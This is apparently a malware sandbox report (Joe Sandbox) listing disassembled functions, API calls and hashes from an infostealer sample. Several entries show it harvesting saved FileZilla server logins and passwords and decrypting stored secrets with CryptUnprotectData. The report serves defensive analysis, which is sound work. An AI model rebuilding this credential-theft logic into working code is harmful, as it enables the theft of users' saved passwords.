                                    • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                    • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                    • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                    Function 007EE697 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 007EE709
                                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 007EE759
                                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 007EE76F
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EEE46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID:
                                    • API String ID: 433455689-0
                                    • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                    • Instruction ID: 649351946a3e0ac865039f583cfc7227564ce1bebd7c9c04a3e9084c0a9d97e2
                                    • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                    • Instruction Fuzzy Hash: 8312CFB1610158EBCB18FB60DD6AEFD7375AB54300F4085ADB60E56291EE385F88CF52
                                    Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                    • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                    • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                    • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                    Function 007E9DC7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007E9DEB
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 007E9E0A
                                    • memcpy.MSVCRT(?,?,?), ref: 007E9E2D
                                    • LocalFree.KERNEL32(?), ref: 007E9E3A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                    • String ID:
                                    • API String ID: 3243516280-0
                                    • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                    • Instruction ID: 5480f710207e8cfcf2c35a0dd3f84d6b91f47c2f4cd1ab4336a63e153a26857c
                                    • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                    • Instruction Fuzzy Hash: 8411F7B9A00209EFDB04CFA8D985AAEB7B9FF89700F104558E915A7350D734AE10CFA1
                                    Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                    • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                    • LocalFree.KERNEL32(?), ref: 00409BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                    • String ID:
                                    • API String ID: 3243516280-0
                                    • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                    • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                    • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                    • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                    Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00A197D8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00A197D8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00A197D8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                    • wsprintfA.USER32 ref: 00417AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 362916592-0
                                    • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                    • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                    • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                    • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                    Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                    • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                    • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                    • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                    Function 007E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .$GetProcAddress.$l
                                    • API String ID: 0-2784972518
                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                    • Instruction ID: 5062e456d27f64fb0c2b7c4c47ed8835d89c5def674100625dd355965f16ba66
                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                    • Instruction Fuzzy Hash: 1E316DB6901649DFDB10CF99C884AADBBF9FF48324F14404AD441A7312D7B5EA85CBA4
                                    Function 007EF8F1 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 007EF985
                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 007EF9D6
                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 007EF9EC
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 007EFD18
                                    • FindClose.KERNEL32(000000FF), ref: 007EFD2A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                    • Instruction ID: 2aea70138e386ede957b2ae320b53ec0857ab1a86b70262e43d0d329734b2c91
                                    • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                                    • Instruction Fuzzy Hash: 56118BB180065CFBCB14EBA0DD699FD7374AF14300F5086AAE61E56693DF381B49CB52
                                    Function 007FD151 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 007FD156
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                    • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                    • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                    • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                    Function 0041CEEA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                    • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                    • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                    • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                    Function 009E98AB Relevance: .1, Instructions: 61COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009E9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9e9000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                    • Instruction ID: 3e7574f10bc40186419f617c26736027c3d3ee8edab2a2c3c93e129f0912730a
                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                    • Instruction Fuzzy Hash: F3117072340100AFDB44DE56DC81FA673EAEB89360B298069E904CB316E675EC02C760
                                    Function 007E0D90 Relevance: .0, Instructions: 43COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                    • Instruction ID: d93ee4a9c41b00e95463f46dc11b6633117ab7b47c475030811e4bf0a63aae05
                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                    • Instruction Fuzzy Hash: 9A01F7727026408FDF21DF61CC04BAA33E5FB89305F0544B4D506D7242E3B8A8818FC0
                                    Function 007F99B7 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 00419750 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 007FD1D3 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                    • Instruction ID: 5b0e001fd8a909a16ae1a5c222f9ac28db2d62202c129080d9e767e27e1a2a33
                                    • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                    • Instruction Fuzzy Hash: F67105B1154B48FBD7633B31DD0BE6977A27F00302F104994BBDF28F368A2668619B52
                                    Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • strtok_s.MSVCRT ref: 0041031B
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                    • lstrlenA.KERNEL32(00000000), ref: 00410393
                                      • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                      • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                    • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                    • lstrlenA.KERNEL32(00000000), ref: 00410427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                    • lstrlenA.KERNEL32(00000000), ref: 00410475
                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                    • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                    • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                    • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                    • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                    • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                    • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                    • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                    • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                    • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                    • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                    • strtok_s.MSVCRT ref: 00410679
                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                    • memset.MSVCRT ref: 004106DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 337689325-514892060
                                    • Opcode ID: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                    • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                    • Opcode Fuzzy Hash: d703adcf312afa78f567e3413873f3226fbd2fc71e0b914fded6cee151632d1c
                                    • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                    Function 007E4827 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00424DA0), ref: 007E4833
                                    • lstrlen.KERNEL32(00424E50), ref: 007E483E
                                    • lstrlen.KERNEL32(00424F18), ref: 007E4849
                                    • lstrlen.KERNEL32(00424FD0), ref: 007E4854
                                    • lstrlen.KERNEL32(00425078), ref: 007E485F
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E486E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E4875
                                    • lstrlen.KERNEL32(00425120), ref: 007E4883
                                    • lstrlen.KERNEL32(004251C8), ref: 007E488E
                                    • lstrlen.KERNEL32(00425270), ref: 007E4899
                                    • lstrlen.KERNEL32(00425318), ref: 007E48A4
                                    • lstrlen.KERNEL32(004253C0), ref: 007E48AF
                                    • lstrlen.KERNEL32(00425468), ref: 007E48C3
                                    • lstrlen.KERNEL32(00425510), ref: 007E48CE
                                    • lstrlen.KERNEL32(004255B8), ref: 007E48D9
                                    • lstrlen.KERNEL32(00425660), ref: 007E48E4
                                    • lstrlen.KERNEL32(00425708), ref: 007E48EF
                                    • lstrlen.KERNEL32(004257B0), ref: 007E4918
                                    • lstrlen.KERNEL32(00425858), ref: 007E4923
                                    • lstrlen.KERNEL32(00425920), ref: 007E492E
